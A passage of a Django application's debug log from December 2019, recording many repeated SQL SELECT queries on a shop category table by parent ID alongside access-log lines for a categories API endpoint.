"shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:35:50,500 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:35:50,503 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:35:50,505 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:35:50,508 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:35:50,510 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:35:50,514 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:35:50,516 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:35:50,519 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:35:50,522 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:35:50,524 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:35:50,526 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:35:50,529 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:35:50,532 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:35:50,535 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:35:50,538 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:35:50,540 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:35:50] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:35:56,237 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-16 07:35:56,240 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:35:56,246 utils 20136 140506422044416 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:35:56,249 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:35:56,253 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) [16/Dec/2019 07:35:56] "GET /api/v1/categories/1 HTTP/1.0" 200 877 DEBUG 2019-12-16 07:35:56,255 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:35:56,259 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:35:56,261 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:35:56,263 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:35:56,266 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:35:56,268 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:35:56,271 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:35:56,274 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:35:56,276 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:35:56,278 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:35:56,280 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:35:56,284 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:35:56,286 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:35:56,288 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:35:56,290 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:35:56,293 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:35:56,296 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:35:56,298 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:35:56,301 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:35:56,303 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:35:56,305 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:35:56,308 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:35:56,311 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:35:56,313 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:35:56,316 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:35:56,318 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:35:56,321 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:35:56,324 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:35:56,326 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:35:56,328 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:35:56,330 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:35:56,333 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:35:56,336 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:35:56,338 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:35:56,341 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:35:56,343 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:35:56,345 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:35:56,347 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:35:56,350 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:35:56,352 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:35:56,354 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:35:56,357 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:35:56,359 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:35:56] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:36:39,182 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:36:39,193 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:36:39,200 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", 